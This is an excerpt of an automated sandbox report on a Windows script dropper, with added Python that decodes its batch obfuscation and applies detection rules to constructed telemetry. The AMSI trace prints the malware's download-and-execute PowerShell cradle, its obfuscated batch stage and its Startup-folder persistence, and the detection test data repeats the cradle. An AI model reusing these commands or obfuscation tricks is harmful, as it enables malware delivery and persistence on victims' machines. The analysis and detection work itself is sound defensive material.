Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbJ source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb* source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb7 source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb; source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb\s' source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbx source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivene.PDB source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f0 source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb]%K source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sn.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbowW source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi64_7184.amsi.csve.pdb(V source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb.s source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbT source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbq source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb? source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbZ] source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbF source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer320805 source: powershell.exe, 00000014.00000002.2491608753.000001F39452D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdby source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbs% source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb189>K source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb29; source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer3281dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbf source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -U", "0", "false");IWshShell3.Run("cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -U", "0", "false");IHost.Sleep("60000");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\c.bat", "true");ITextStream.WriteLine("@echo off");ITextStream.WriteLine("setlocal enabledelayedexpansion");ITextStream.WriteLine("set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"");ITextStream.WriteLine("set "Um=&& ifeifxifitif"");ITextStream.WriteLine("set "Wl=nifotif ifdeiffiifnifedif pTif"");ITextStream.WriteLine("if %Wl:if=% (%Rp:if=%%0 %Um:if=%)");ITextStream.WriteLine("::k4iOKIjPUfNTOHybM5OalyZ5C5kberg9LHEenXfGAhQnesJQN226hW1KTTkyVbRHhR1qsSM3MeKLtH2b5cwdGrN0FpATH8/yV88bkfQvr9+aiU144gRqrkXoQSg38QOuWY/waDqooa6VD8X8/9OWblcrnKRJ/NSpOTua/ez5Udb7z6s48bc0/ng8tlHvbgeQeuHJ5E549dY5QNZbz06GrCC+vtYRX3F");ITextStream.WriteLine("::E2zivkiCpZ9qeHOyHmrgaS+PeP0IYd9eo4BtkeeMePZDhVlreL6vBliZKSMjJH49MMTqgTo0XTXRZT0Ga6t6n7jaHRy05BXxe0GY5j9iHAgJ3SSYJpGEU8aTDSp0l/spvAmBXCD7doocft1E4dH+FTvmKpp2MrH9qc5fzKbXt2E4veQGpbv5Boe/iDIwfENBJ3yOqpp0XRbN7OClKiT7/KuJtIB3rqS");ITextStream.WriteLine("set "VD=WifinifdoifwsifPoifwiferifSifhelifl\ifvif1.if0\ifpowiferifsifhifeiflifl.eifxeif"");ITextStream.WriteLine("set vE=C:\Windows\System32\%VD:if=%");ITextStream.WriteLine("set "Kvr=;$NifHifESif='ifErifLifgifzniftifrLifgzifryifrifLifgifzPoifrLifgziifnrLifgztifrLifgz'if.ifReifplifaceif('rifLgifz',if if'if'if),if'CHifprifLhHifprifLifanifHprifLifgifeEHifprifLxiftHpifrifLeifnifsHifprLifiifonifHprifL"");ITextStream.WriteLine("set "EYD=$hoifstif.UIif.RifaifwUifI.ifWifinifdoifwTiiftifle=if"");ITextStream.WriteLine("echo %EYD:if=%'%~0'%Kvr:if=% | %vE%");ITextStream.WriteLine("timeout /nobreak /t 1 >nul");ITextStream.Close();IWshShell3.Run("cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -U", "0", "false");IHost.Sleep("60000");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\c.bat", "true");ITextStream.WriteLine("@echo off");ITextStream.WriteLine("setlocal enabledelayedexpansion");ITextStream.WriteLine("set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"");ITextStream.WriteLine("set "Um=&& ifeifxifitif"");ITextStream.WriteLine("set "Wl=nifotif ifdeiffiifnifedif pTif"");ITextStream.WriteLine("if %Wl:if=% (%Rp:if=%%0 %Um:if=%)");ITextStream.WriteLine("::k4iOKIjPUfNTOHybM5OalyZ5C5kberg9LHEenXfGAhQnesJQN226hW1KTTkyVbRHhR1qsSM3MeKLtH2b5cwdGrN0FpATH8/yV88bkfQvr9+aiU144gRqrkXoQSg38QOuWY/waDqooa6VD8X8/9OWblcrnKRJ/NSpOTua/ez5Udb7z6s48bc0/ng8tlHvbgeQeuHJ5E549dY5QNZbz06GrCC+vtYRX3F");ITextStream.WriteLine("::E2zivkiCpZ9qeHOyHmrgaS+PeP0IYd9eo4BtkeeMePZDhVlreL6vBliZKSMjJH49MMTqgTo0XTXRZT0Ga6t6n7jaHRy05BXxe0GY5j9iHAgJ3SSYJpGEU8aTDSp0l/spvAmBXCD7doocft1E4dH+FTvmKpp2MrH9qc5fzKbXt2E4veQGpbv5Boe/iDIwfENBJ3yOqpp0XRbN7OClKiT7/KuJtIB3rqS");ITextStream.WriteLine("se
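The batch file written by the captured CreateTextFile/WriteLine calls above hides its real commands behind a junk token ("if") that cmd.exe strips at run time through `%VAR:if=%` substring substitution, and the PowerShell it pipes in through `%vE%` repeats the trick with `'padded'.Replace('rLgz', '')`. The Python decoder below is an added example, not part of the Joe Sandbox report or of the sample: it replays that expansion over the batch lines copied from the trace (the two `::` comment lines carrying the encoded payload are left out, since they are opaque data rather than commands) and recovers the plaintext. Its model of cmd expansion is a deliberate simplification: undefined variables and parameters such as `%0` / `%~0` are left in place rather than expanded.

```python
import re

# Batch lines as written by the captured WriteLine calls (copied from the
# AMSI trace). The two "::" comment lines holding the encoded payload are
# omitted here: they are opaque data, not commands.
CAPTURED_BATCH = [
    '@echo off',
    'setlocal enabledelayedexpansion',
    'set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"',
    'set "Um=&& ifeifxifitif"',
    'set "Wl=nifotif ifdeiffiifnifedif pTif"',
    'if %Wl:if=% (%Rp:if=%%0 %Um:if=%)',
    r'set "VD=WifinifdoifwsifPoifwiferifSifhelifl\ifvif1.if0\ifpowiferifsifhifeiflifl.eifxeif"',
    r'set vE=C:\Windows\System32\%VD:if=%',
    "set \"Kvr=;$NifHifESif='ifErifLifgifzniftifrLifgzifryifrifLifgifzPoifrLifgziifnrLifgztifrLifgz'"
    "if.ifReifplifaceif('rifLgifz',if if'if'if),if'CHifprifLhHifprifLifanifHprifLifgifeEHifprifL"
    "xiftHpifrifLeifnifsHifprLifiifonifHprifL\"",
    'set "EYD=$hoifstif.UIif.RifaifwUifI.ifWifinifdoifwTiiftifle=if"',
    "echo %EYD:if=%'%~0'%Kvr:if=% | %vE%",
    'timeout /nobreak /t 1 >nul',
]

# The two cmd.exe percent-expansion forms the script relies on.
SUBST_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*):([^=%]+)=([^%]*)%')   # %VAR:old=new%
PLAIN_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)%')                    # %VAR%


def expand(line, env):
    """Expand one batch line the way cmd.exe does before executing it.

    Variable names and the search string of %VAR:old=new% are matched
    case-insensitively, as in cmd. Simplification: undefined variables and
    parameters such as %0 / %~0 are left untouched instead of expanded.
    """
    def subst(m):
        name, old, new = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)
        return re.sub(re.escape(old), lambda _: new, env[name], flags=re.IGNORECASE)

    line = SUBST_RE.sub(subst, line)
    return PLAIN_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), line)


def decode_batch(lines):
    """Replay the assignments in order and return (env, expanded lines).

    Each line is expanded before it is 'executed', so a later line reading
    %VD:if=% sees the value assigned earlier, exactly as cmd.exe would.
    Only 'set' is interpreted; nothing here runs the commands.
    """
    env, decoded = {}, []
    for raw in lines:
        line = expand(raw, env)
        m = re.match(r'set\s+(.*)', line, re.IGNORECASE)
        if m:
            body = m.group(1)
            if body.startswith('"'):
                # set "NAME=value": cmd keeps the text between the first and last quote
                body = body[1:body.rfind('"')]
            name, _, value = body.partition('=')
            env[name.strip().lower()] = value
        decoded.append(line)
    return env, decoded


def junk_tokens(lines):
    """Collect the (variable, token) pairs the script strips via %VAR:token=%.

    The token is whatever the author padded the strings with; here it is 'if'.
    """
    return {(m.group(1).lower(), m.group(2))
            for line in lines
            for m in SUBST_RE.finditer(line)
            if m.group(3) == ''}


# Second layer: the PowerShell fed to stdin repeats the trick as
# 'padded literal'.Replace('junk', ''). String.Replace is case-sensitive.
PS_REPLACE_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)',\s*''\)")


def fold_ps_replace(text):
    return PS_REPLACE_RE.sub(lambda m: "'" + m.group(1).replace(m.group(2), '') + "'", text)


if __name__ == '__main__':
    env, lines = decode_batch(CAPTURED_BATCH)
    for var, token in sorted(junk_tokens(CAPTURED_BATCH)):
        print(var, '->', repr(expand('%' + var + ':' + token + '=%', env)))
    print()
    for line in lines:
        print(fold_ps_replace(line))
```

Run stand-alone, the decoder shows that the `if` line relaunches the batch minimized (`if not defined pT (set pT=1 && start "" /min %0 && exit)`), that `vE` resolves to `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, and that the echo pipes `$host.UI.RawUI.WindowTitle='%~0';$NHES='EntryPoint', ...` into that PowerShell, so the second stage learns its own .cmd path from the window title. The `'CHprL...'` fragment is still padded with a second token and is cut off in the trace, so the decoder leaves it as captured rather than guessing at it.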
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BAB785E push eax; iretd 13_2_00007FFD9BAB786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9BAB776A pushad ; iretd 13_2_00007FFD9BAB785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd
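The chain this report records (wscript.exe starting cmd.exe, which starts powershell.exe with -ExecutionPolicy Bypass and an `iex (iwr ...)` cradle; that PowerShell spawning a second powershell.exe with `-w hidden`; and a .cmd written to the Start Menu Startup folder) maps one-to-one onto the signatures listed in the report header. The Python below is an added example, not part of Joe Sandbox or of the sample: it runs that detection logic over constructed process and file events modelled on the chain. The PIDs, the download URL and the benign backup script in the sample data are made up for the demonstration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


@dataclass
class FileEvent:
    pid: int        # process that wrote the file
    path: str


SCRIPT_HOSTS = ('wscript.exe', 'cscript.exe')
SCRIPT_EXT = ('.cmd', '.bat', '.vbs', '.vbe', '.js', '.jse', '.ps1', '.wsf')
STARTUP_DIR = re.compile(r'\\Start Menu\\Programs\\Startup\\', re.IGNORECASE)
CRADLE = re.compile(r'\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b',
                    re.IGNORECASE)
EXEC_POLICY_BYPASS = re.compile(r'-(ep|exec|executionpolicy)\s+(bypass|unrestricted)', re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r'-(w|win|windowstyle)\s+hidden', re.IGNORECASE)


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def ancestors(ev, by_pid):
    """Image names of the parent, grandparent, ... of ev (nearest first)."""
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None:
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def evaluate(proc_events, file_events):
    """Return (pid, rule name) pairs for every event that matches a rule."""
    by_pid = {e.pid: e for e in proc_events}
    hits = []
    for ev in proc_events:
        if basename(ev.image) != 'powershell.exe':
            continue
        parents = ancestors(ev, by_pid)
        if EXEC_POLICY_BYPASS.search(ev.cmdline):
            hits.append((ev.pid, 'Bypasses PowerShell execution policy'))
        if CRADLE.search(ev.cmdline):
            hits.append((ev.pid, 'PowerShell Download and Execution Cradle'))
        # parent or grandparent is a script host: covers "via cmd or directly"
        if any(p in SCRIPT_HOSTS for p in parents[:2]):
            hits.append((ev.pid, 'Wscript starts Powershell (via cmd or directly)'))
        if parents[:1] == ['powershell.exe'] and HIDDEN_WINDOW.search(ev.cmdline):
            hits.append((ev.pid, 'PowerShell spawns hidden PowerShell'))
    for fe in file_events:
        if STARTUP_DIR.search(fe.path) and fe.path.lower().endswith(SCRIPT_EXT):
            writer = by_pid.get(fe.pid)
            who = basename(writer.image) if writer else '?'
            hits.append((fe.pid, f'Drops script at startup location ({who} wrote {basename(fe.path)})'))
    return hits


# Constructed telemetry modelled on this report's process tree (not real data).
PROC_EVENTS = [
    ProcEvent(4, 0, r'C:\Windows\explorer.exe', 'explorer.exe'),
    ProcEvent(10, 4, r'C:\Windows\System32\wscript.exe', r'wscript.exe "C:\Users\user\Desktop\7299_output.vbs"'),
    ProcEvent(11, 10, r'C:\Windows\System32\cmd.exe',
              'cmd /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -UseBasicParsing http://203.0.113.7/s)"'),
    ProcEvent(12, 11, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
              'powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -UseBasicParsing http://203.0.113.7/s)"'),
    ProcEvent(13, 12, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden'),
    ProcEvent(20, 4, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
              r'powershell -NoProfile -File C:\Scripts\nightly-backup.ps1'),   # benign admin use
]
FILE_EVENTS = [
    FileEvent(13, r'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd'),
    FileEvent(20, r'C:\Users\user\AppData\Local\Temp\backup.log'),
]

if __name__ == '__main__':
    for pid, rule in evaluate(PROC_EVENTS, FILE_EVENTS):
        print(pid, rule)
```

The ancestry check is what keeps the rules usable: a bare `-ExecutionPolicy Bypass` is common in legitimate automation, but the same flag two hops below wscript.exe, combined with a download cradle, is the sequence this sample exhibits. The benign backup script in the sample events produces no hit.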
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 identical consecutive entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (79 identical consecutive entries)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (2 identical consecutive entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (31 identical consecutive entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
